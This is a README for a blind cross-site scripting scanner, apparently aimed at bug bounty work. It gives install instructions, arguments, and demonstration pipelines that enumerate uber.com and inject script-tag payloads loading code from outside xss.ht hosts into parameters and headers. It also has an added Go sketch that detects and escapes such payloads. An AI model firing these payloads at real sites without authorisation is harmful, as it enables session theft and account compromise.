ethicalhackingplayground/bxss

Bxss - Blind XSS Scanner

License: MIT

Description

Blind XSS Scanner is a tool that can be used to scan for blind XSS vulnerabilities in web applications.


Features

  • Inject Blind XSS payloads into custom headers
  • Inject Blind XSS payloads into parameters
  • Uses different request methods (PUT, POST, GET, OPTIONS) all at once
  • Tool Chaining
  • Really fast
  • Easy to set up

Install

go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

Arguments

| Argument | Description | Default |
| --- | --- | --- |
| -appendMode | Append the payload to the parameter | |
| -concurrency int | Set the concurrency | 30 |
| -header string | Set the custom header | "User-Agent" |
| -headerFile string | Path to file containing headers to test | |
| -parameters | Test the parameters for blind xss | |
| -payload string | The blind XSS payload | |
| -payloadFile string | Path to file containing payloads to test | |

Demonstration


Blind XSS In Parameters

subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters

Blind XSS In X-Forwarded-For Header

subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"
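
Seen from the receiving application, the two runs above deliver script markup in query parameters and in a request header, and it only executes later when a back-office page renders the stored value unescaped. The Go sketch below is an added example, not part of bxss: it flags such fields on an incoming request and HTML-escapes them for display. InspectRequest, Finding, sampleRequest and the .example hosts are hypothetical names, and the request is constructed.

```go
package main

import (
	"fmt"
	"html"
	"net/http"
	"net/url"
	"regexp"
	"sort"
)

// scriptTag matches an opening <script tag in any letter case.
var scriptTag = regexp.MustCompile(`(?i)<\s*script\b`)

// Finding is one request field that carried script markup.
type Finding struct {
	Location string // "header:<name>" or "param:<name>"
	Escaped  string // value HTML-escaped, safe to render in a back-office view
}

// InspectRequest checks every header value and decoded query parameter,
// whatever the request method, and returns the fields containing a <script tag.
func InspectRequest(r *http.Request) []Finding {
	var out []Finding
	scan := func(kind string, fields map[string][]string) {
		for name, vals := range fields {
			for _, v := range vals {
				if scriptTag.MatchString(v) {
					out = append(out, Finding{kind + ":" + name, html.EscapeString(v)})
				}
			}
		}
	}
	scan("header", r.Header)
	scan("param", r.URL.Query())
	sort.Slice(out, func(i, j int) bool { return out[i].Location < out[j].Location })
	return out
}

// sampleRequest builds a constructed request; both hosts are placeholders.
func sampleRequest() *http.Request {
	p := `"><script src=https://collector.example></script>`
	r, _ := http.NewRequest("PUT", "https://app.example/item?page=2&q="+url.QueryEscape(p), nil)
	r.Header.Set("User-Agent", "Mozilla/5.0")
	r.Header.Set("X-Forwarded-For", p)
	return r
}

func main() { fmt.Println(InspectRequest(sampleRequest())) }
```

The pattern match is a logging and alerting aid only; escaping at render time is what keeps a stored header or parameter from executing in the viewer's browser.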

If you get a bounty please support by buying me a coffee

